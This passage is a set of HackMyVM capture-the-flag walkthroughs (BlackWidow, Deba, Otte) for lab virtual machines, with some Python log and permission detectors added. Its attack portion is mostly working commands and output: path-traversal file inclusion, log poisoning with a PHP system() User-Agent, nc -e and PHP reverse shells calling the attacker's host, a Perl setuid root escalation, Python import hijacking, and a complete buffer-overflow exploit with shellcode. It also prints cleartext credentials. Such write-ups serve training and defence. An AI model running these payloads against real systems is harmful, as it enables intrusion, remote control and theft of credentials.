  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000060:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../etc/passwd"            
 000000062:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../../../etc/passwd"
 000000061:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../etc/passwd"        
 000000403:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../etc/group"            
 000000404:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../../etc/group"      

We can read /etc/passwd now.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
 ...

Fuzz for log files that are readable through the LFI.

 wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt                                                                        
 ...
 000000031:   200        0 L      0 W        0 Ch        "/var/log/vsftpd.log"
 000000030:   200        0 L      0 W        0 Ch        "/var/log/error.log"
 000000032:   200        0 L      0 W        0 Ch        "/var/log/message"
 000000023:   200        0 L      0 W        0 Ch        "/usr/local/apache/logs/error_log"
 000000025:   200        0 L      0 W        0 Ch        "/var/log/apache/error_log"
 000000026:   200        0 L      0 W        0 Ch        "/var/log/apache2/error_log"
 000000018:   500        0 L      0 W        0 Ch        "/var/log/apache2/access.log"  

Note that /var/log/apache2/access.log returns 500 while every other file returns 200. That is because gobuster was run several times and access.log has grown too big to fetch. After resetting the VM to its original state, the file can be read through the LFI.

The log also records the User-Agent string, which we control and can replace with PHP code.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
 192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
 192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"

Set the User-Agent to PHP code, then check that it executes when the log is included.

 curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100        
 <html>
 <img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
 </html>

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
 192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
 "
 192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"
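
The three LFI chains on this page (the GraceMedia cfg parameter on Prime, file.php on Broken and started.php here, the last two finished by writing PHP into the web server log through User-Agent) leave the same traces in the access log: traversal sequences in the query string, requests for log or system files, and PHP tags in a client-supplied header. As an added example, not code from the walkthroughs, here is a Python detector over Apache/nginx combined-format lines that raises one finding per rule and then correlates sources that both planted a PHP tag and included a log file. The sample lines are constructed from the requests shown on this page; rule names and the double-decoding depth are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set
from urllib.parse import unquote

# Apache/nginx "combined" log format; the closing quote of the agent is optional
# because an injected agent can contain a newline and cut the line short.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"?'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)
LOG_PATHS = ("/var/log/", "access.log", "error.log", "auth.log")
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", ".ssh/")


def decode_fully(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so %252e%252e%252f style double encoding is seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse_line(line: str) -> List[Dict[str, str]]:
    """Return one finding per rule that a single log line triggers."""
    m = LOG_RE.match(line)
    if not m:
        return []
    f = m.groupdict()
    request = decode_fully(f["request"]).lower()
    rules: List[str] = []
    if TRAVERSAL_RE.search(request):
        rules.append("path_traversal")
    if any(p in request for p in LOG_PATHS):
        rules.append("log_file_target")        # log poisoning needs the log to be included
    if any(p in request for p in SENSITIVE_PATHS):
        rules.append("sensitive_file_target")
    if PHP_TAG_RE.search(f["agent"]) or PHP_TAG_RE.search(f["referer"]):
        rules.append("php_in_client_header")   # the poisoning write itself
    if PHP_TAG_RE.search(request):
        rules.append("php_in_request")
    return [{"src": f["src"], "time": f["time"], "rule": r, "request": f["request"][:80]} for r in rules]


def analyse_log(text: str) -> List[Dict[str, str]]:
    return [finding for line in text.splitlines() for finding in analyse_line(line)]


def poisoning_sources(findings: List[Dict[str, str]]) -> Set[str]:
    """Sources that both wrote PHP into a client header and requested a log file via the app."""
    rules_by_src: Dict[str, Set[str]] = defaultdict(set)
    for f in findings:
        rules_by_src[f["src"]].add(f["rule"])
    return {src for src, rules in rules_by_src.items()
            if {"php_in_client_header", "log_file_target"} <= rules}


# Constructed sample lines modelled on the requests shown in these walkthroughs.
SAMPLE_LOG = """\
192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "<?php system($_GET[c]); ?>"
192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 251 "-" "curl/7.74.0"
192.168.33.128 - - [12/May/2021:18:05:11 +0000] "GET /wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1451 "-" "curl/7.74.0"
10.0.0.7 - - [25/May/2021:04:30:00 -0400] "GET /company/index.html HTTP/1.1" 200 42271 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    found = analyse_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['src']:15} {f['rule']:22} {f['request']}")
    print("log-poisoning chains from:", sorted(poisoning_sources(found)))
```

The per-line rules are noisy on their own (any scanner produces traversal hits); the correlation in poisoning_sources is what turns them into an alert worth paging on, because a single source has to perform both halves of the chain.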

In order to get a reverse shell, I tried many ways and at last used the following method. Run a temporary HTTP server locally with a PHP reverse shell named "r" in its root folder.

 sudo php -S 0.0.0.0:80
 [Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing

On the VM, use curl to fetch the reverse shell "r" and save it as "r.php".

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'

Visit the php shell.

 curl http://192.168.56.100/company/r.php

Then we get reverse shell.

 nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:48366.
 Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
  05:01:50 up 37 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Found a strange string in /var/backups/auth.log, which is viper's password: sshd logged it as an invalid user name. (I think this step is the hardest.)

 Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
 Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
 Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown
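
Two things on this page end up in the same file: the hydra run against atenea on Hidden (a burst of failed SSH logins from one source) and the password viper once typed into the user name prompt, which sshd recorded as `Invalid user ?V1p3r2020!?`. As an added example, not part of the walkthrough, here is a Python pass over auth.log lines that flags both: brute-force bursts per source and "Invalid user" names that look like leaked secrets. The threshold, window and the secret-likeness heuristic are assumptions; the sample log is constructed from the lines quoted above plus a hydra-style burst.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple

TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) ")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+)")
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<src>[\d.]+) port \d+")
VALID_USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


class AuthEvent(NamedTuple):
    ts: datetime
    kind: str    # "failed" or "invalid"
    user: str
    src: str


def parse_auth_log(text: str) -> List[AuthEvent]:
    """Extract failed-login and invalid-user events from sshd lines in auth.log."""
    events: List[AuthEvent] = []
    for line in text.splitlines():
        t = TS_RE.match(line)
        if not t:
            continue
        # syslog timestamps carry no year; strptime defaults to 1900, which is fine for windowing
        ts = datetime.strptime(re.sub(r"\s+", " ", t.group("ts")), "%b %d %H:%M:%S")
        m = INVALID_RE.search(line)
        if m:
            events.append(AuthEvent(ts, "invalid", m.group("user"), m.group("src")))
            continue
        m = FAILED_RE.search(line)
        if m:
            events.append(AuthEvent(ts, "failed", m.group("user"), m.group("src")))
    return events


def brute_force_sources(events: List[AuthEvent], threshold: int = 5, window_s: int = 60) -> Dict[str, int]:
    """Sources with >= threshold failures inside any window_s-second window (assumed thresholds)."""
    by_src: Dict[str, List[datetime]] = defaultdict(list)
    for e in events:
        by_src[e.src].append(e.ts)
    flagged: Dict[str, int] = {}
    for src, times in by_src.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[src] = best
    return flagged


def looks_like_secret(name: str) -> bool:
    """Heuristic: a rejected 'user name' that is not a legal login name and has password-like shape."""
    if VALID_USERNAME_RE.match(name):
        return False
    return len(name) >= 6 and any(c.isdigit() for c in name) and any(not c.isalnum() or c.isupper() for c in name)


def leaked_secret_usernames(events: List[AuthEvent]) -> List[str]:
    """'Invalid user' names that look like a password typed into the login prompt."""
    return sorted({e.user for e in events if e.kind == "invalid" and looks_like_secret(e.user)})


# Constructed sample: a hydra-style burst (as on Hidden), the lines quoted from BlackWidow's
# /var/backups/auth.log, and a benign mistyped user name.
SAMPLE_AUTH_LOG = """\
May 31 19:29:01 hidden sshd[1201]: Failed password for atenea from 192.168.56.150 port 40001 ssh2
May 31 19:29:01 hidden sshd[1203]: Failed password for atenea from 192.168.56.150 port 40002 ssh2
May 31 19:29:02 hidden sshd[1205]: Failed password for atenea from 192.168.56.150 port 40003 ssh2
May 31 19:29:03 hidden sshd[1207]: Failed password for atenea from 192.168.56.150 port 40004 ssh2
May 31 19:29:04 hidden sshd[1209]: Failed password for atenea from 192.168.56.150 port 40005 ssh2
May 31 19:29:05 hidden sshd[1211]: Failed password for atenea from 192.168.56.150 port 40006 ssh2
May 31 19:40:00 hidden sshd[1300]: Accepted password for atenea from 192.168.56.150 port 40044 ssh2
Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown
Dec 12 16:57:10 test sshd[29570]: Invalid user admin from 10.9.8.7 port 5000
"""

if __name__ == "__main__":
    ev = parse_auth_log(SAMPLE_AUTH_LOG)
    print("brute-force sources:", brute_force_sources(ev))
    print("rotate these credentials:", leaked_secret_usernames(ev))
```

The second check is the one that would have prevented this box: an auth.log copy in /var/backups readable by www-data is a confidentiality problem on its own, but a password logged in clear text should be rotated as soon as it is seen, regardless of who can read the file.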

Check viper's bash history.

 viper@blackwidow:~$ cat .bash_history
 ...
 arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ls                                                  
 ./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 su root      

Find the file named arsenic.

 viper@blackwidow:~$ find / -name arsenic 2>/dev/null
 /home/viper/backup_site/assets/vendor/weapon/arsenic

Run arsenic with the setuid one-liner from the history to get a root shell.

 viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 # id                                                
 uid=0(root) gid=1001(viper) groups=1001(viper)

HackMyVm Deba Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Deba

Scan ports, found 22, 80 and 3000 are open.

 # Nmap 7.91 scan initiated Fri May 14 08:30:51 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
 |   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
 |_  256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title (text/html; charset=utf-8).

Scanning port 80 finds nothing. Port 3000 looks like a Node.js site.

[image-20210524174309208.png]

Use the classic Node.js 'node-serialize' remote code execution PoC from https://www.exploit-db.com/exploits/49552.

Get reverse shell as www-data. Check sudo.

 www-data@debian:/home/low$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on debian:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on debian:
     (ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py

Check the files in /home/low/scripts: script.py imports main, and main.py is owned by www-data, so we can write it.

 www-data@debian:/home/low/scripts$ ls -la
 ls -la
 total 16
 drwxr-xr-x 2 low      low      4096 may  7 17:59 .
 drwxr-xr-x 8 low      low      4096 may  7 23:45 ..
 -rwxr-xr-x 1 www-data www-data   88 may  7 10:57 main.py
 -rw-r--r-- 1 low      low        80 may  7 10:44 script.py

 www-data@debian:/home/low/scripts$ cat script.py
 cat script.py
 import main
 import os
 print("\n")
 os.system("ip a | grep enp0s3")
 print("\n")

 www-data@debian:/home/low/scripts$ cat main.py
 cat main.py
 from os import system as main
 print("\n")
 print("Just main")
 main("whoami")
 print("\n")

Modify main.py to get shell as user low.

 echo 'import os;os.system("/bin/bash");' > main.py
 sudo -u low python3 /home/low/scripts/script.py
 low@debian:~/scripts$ id
 id
 uid=1001(low) gid=1001(low) grupos=1001(low)

Upload id_rsa.pub to get ssh access as user low.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 chmod 600 authorized_keys

After logging in as low, run pspy64. A cron job runs /home/debian/Documentos/backup/dissapeared.py as user debian (UID 1000) every minute.

 2021/05/14 05:31:02 CMD: UID=0    PID=2240   | /usr/sbin/CRON -f
 2021/05/14 05:31:02 CMD: UID=1000 PID=2241   | /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py

Create the file and write shell code in it.

 low@debian:/home/debian/Documentos/backup$ echo 'import os;os.system("nc 192.168.56.150 2234 -e /bin/bash");' > dissapeared.py
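
Both escalations on Deba come from the same class of weakness: code that runs as one user (script.py under sudo, dissapeared.py under cron) is resolved from files that another user can write or create. As an added example, not from the walkthrough, here is a Python checker that takes a script path, lists the modules it imports, resolves them from the script's own directory (the first sys.path entry when a script is run directly) and reports any module file, script or containing directory that another user could write; for a cron target that does not exist yet, it checks whether the directory allows it to be created. It builds its sample tree in a temporary directory, so the ownership difference seen on Deba (main.py owned by www-data) is simulated with group/world-writable mode bits, an assumption noted in the code; the restrict_writes helper is a hypothetical mitigation, not anything from the box.

```python
import ast
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List


def imported_modules(script: Path) -> List[str]:
    """Top-level module names a script imports (what `import x` / `from x import y` resolve)."""
    tree = ast.parse(script.read_text(), filename=str(script))
    names: List[str] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.extend(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.append(node.module.split(".")[0])
    return names


def writable_by_others(path: Path) -> bool:
    """Group- or world-writable mode bits (assumption: stands in for the ownership
    difference seen on Deba, where main.py belonged to www-data rather than low)."""
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_script(script: Path) -> List[Dict[str, str]]:
    """Report import hijack opportunities for a script that runs with elevated rights."""
    script = script.resolve()
    here = script.parent            # sys.path[0] when a script is executed directly
    findings: List[Dict[str, str]] = []
    if writable_by_others(script):
        findings.append({"path": str(script), "issue": "script itself is writable by another user"})
    if writable_by_others(here):
        findings.append({"path": str(here), "issue": "script directory is writable: any import can be shadowed"})
    for name in imported_modules(script):
        for candidate in (here / f"{name}.py", here / name / "__init__.py"):
            if candidate.exists():
                owner_differs = candidate.stat().st_uid != script.stat().st_uid
                if writable_by_others(candidate) or owner_differs:
                    findings.append({"path": str(candidate),
                                     "issue": f"module '{name}' resolves from the script directory and is writable by another user"})
    return findings


def audit_target(path: Path) -> List[Dict[str, str]]:
    """For a cron/sudo target: audit it if present, else flag a missing file in a writable dir."""
    path = path.resolve()
    if path.exists():
        if path.suffix == ".py":
            return audit_script(path)
        return [{"path": str(path), "issue": "target is writable by another user"}] if writable_by_others(path) else []
    parent = path.parent
    while not parent.exists():
        parent = parent.parent
    if writable_by_others(parent):
        return [{"path": str(path), "issue": f"target does not exist and {parent} is writable: another user can create it"}]
    return []


def restrict_writes(path: Path) -> None:
    """Hypothetical mitigation: drop group/other write bits (on Deba the real fix is chown to low)."""
    os.chmod(path, path.stat().st_mode & ~(stat.S_IWGRP | stat.S_IWOTH))


def build_sample_tree() -> Path:
    """Constructed mock of /home/low/scripts and the backup directory from the Deba walkthrough."""
    root = Path(tempfile.mkdtemp(prefix="deba_"))
    scripts = root / "scripts"
    scripts.mkdir()
    (scripts / "script.py").write_text("import main\nimport os\nos.system('ip a | grep enp0s3')\n")
    (scripts / "main.py").write_text("from os import system as main\nmain('whoami')\n")
    os.chmod(scripts, 0o755)
    os.chmod(scripts / "script.py", 0o644)
    os.chmod(scripts / "main.py", 0o666)   # stands in for "owned by www-data"
    backup = root / "backup"
    backup.mkdir()
    os.chmod(backup, 0o777)                # stands in for "low can create files here"
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for f in audit_script(root / "scripts" / "script.py") + audit_target(root / "backup" / "dissapeared.py"):
        print(f"{f['path']}: {f['issue']}")
```

Note that `import os` in script.py produces no finding: no os.py exists next to the script, so the import falls through to the standard library, which is exactly why the shadowing only works for names that already resolve from (or can be planted in) a directory the attacker controls.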

Get reverse shell as user debian.

 nc -nlvp 2234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::2234
 Ncat: Listening on 0.0.0.0:2234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45812.
 id
 uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)

Spawn an interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'

Here, we can upload id_rsa.pub again, to get ssh login.

Check sudo again.

 debian@debian:~$ sudo -l
 Matching Defaults entries for debian on debian:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User debian may run the following commands on debian:
     (ALL : root) NOPASSWD: /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe

Running brainfuck.exe opens port 9999 and reads user input.

[image-20210524180541022.png]

Disassemble brainfuck.exe: the vulnerability is in the get_reply function, which strcpy's the input into a fixed-size stack buffer.

 int __cdecl get_reply(char *Source)
 {
   size_t v1; // eax
   char Destination[520]; // [esp+10h] [ebp-208h] BYREF

   printf("[get_reply] s = [%s]\n", Source);
   strcpy(Destination, Source);
   v1 = strlen(Destination);
   printf("[get_reply] copied %d bytes to buffer\n", v1);
   return strcmp(Destination, "shitstorm\n");
 }

The buffer holds 520 bytes, followed by 4 bytes of saved ebp and 4 bytes of return address. Generate a test string accordingly.

 python3 -c "print('a'*520+'bbbb'+'cccc')"
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc

Test it on Windows under OllyDbg: the return address is overwritten exactly by 'cccc'.

[image-20210524172438560.png]

brainfuck.exe also contains a jmp esp gadget, which ropper finds.

 ropper --file brainfuck.exe --search 'jmp esp'
 [INFO] Load gadgets for section: .text
 [LOAD] loading... 100%
 [LOAD] removing double gadgets... 100%
 [INFO] Searching for gadgets: jmp esp

 [INFO] File: brainfuck.exe
 0x311712f3: jmp esp;

Then we can write the exploit with the classic shellcode.

 #!/usr/bin/python3
 import socket
 target_ip='192.168.56.100'
 target_port=9999
 recv_buf=4096
 junk = b'a' *520+b'bbbb'
 ret_addr=b'\xf3\x12\x17\x31'
 #the classic shellcode
 shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
 payload = b''
 payload += junk
 payload += ret_addr
 payload +=shell_code
 with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
     clientSock.connect((target_ip,target_port))
     data_from_srv = clientSock.recv(recv_buf)
     print(f"Reply --> {data_from_srv}")
     print(f"Sending --> {payload}")
     clientSock.sendall(payload)

Start brainfuck.exe with sudo on the VM, run exp.py from the local machine, and we get a root shell.

HackMyVm Otte Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Otte

Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.00099s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftp      ftp            89 May 15 12:25 note.txt
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
 |   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
 |_  256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38
 | http-auth:
 | HTTP/1.1 401 Unauthorized\x0D
 |_  Basic realm=Siemens - Root authentification
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: 401 Unauthorized
 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Log in to FTP anonymously and fetch note.txt.

 cat note.txt
 Hi thomas ! I put on you personal folder the php code you asked me !

 See you later +++

Visit port 80, need authentication.

[image-20210523214949625.png]

Following the hint in the realm name, search for default Siemens router credentials. (This step was hard for me because I have never used a Siemens router.)

https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

After some failures, we get the correct credentials.

 root zP2wxY4uE

Then we can scan for folders and files with those credentials.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log -U root -P zP2wxY4uE

 /index.php            (Status: 200) [Size: 28]
 /image                (Status: 200) [Size: 47076]
 /config.php           (Status: 200) [Size: 0]
 /thinkgeek.php        (Status: 200) [Size: 28]

Fuzz the parameter name of thinkgeek.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28

 000007535:   200        0 L      0 W        0 Ch        "file"  

Try the LFI against /etc/passwd.

 curl -u  root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'

 root:x:0:0:root:/root:/bin/bash
 ...
 thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
 ...
 laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
 cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Following the hint in note.txt, fuzz for /home/thomas/*.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 0

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload      
 =====================================================================

 000016344:   200        2 L      3 W        20 Ch       "shell"  

Fuzz the parameter of shell.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 20

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload  
 =====================================================================

 000004959:   200        3 L      6 W        74 Ch       "command"

Include shell.php through the LFI and pass a reverse shell command in its "command" parameter.

 http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash

In another terminal, listen to port 1234, and get reverse shell.

 ~ nc -nlvp 1234    
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59386.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@otte:/var/www/html$

In /home/thomas, read nightmare.txt.

 www-data@otte:/home/thomas$ ls -la
 ls -la
 total 100
 drwxr-xr-x 4 thomas thomas  4096 May 20 09:46 .
 drwxr-xr-x 5 root   root    4096 May 16 12:34 ..
 -rw------- 1 thomas thomas    50 May 20 09:46 .Xauthority
 lrwxrwxrwx 1 thomas thomas     9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r-- 1 thomas thomas   220 May 15 12:12 .bash_logout
 -rw-r--r-- 1 thomas thomas  3526 May 17 14:42 .bashrc
 drwxr-xr-x 3 thomas thomas  4096 May 15 14:00 .local
 -rw-r--r-- 1 thomas thomas   807 May 15 12:12 .profile
 drwx------ 2 thomas thomas  4096 May 17 09:35 .ssh
 -rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
 -rw-r--r-- 1 thomas thomas   122 May 15 14:56 nightmare.txt
 -rwxr-xr-x 1 thomas thomas    93 May 17 09:15 shell.php
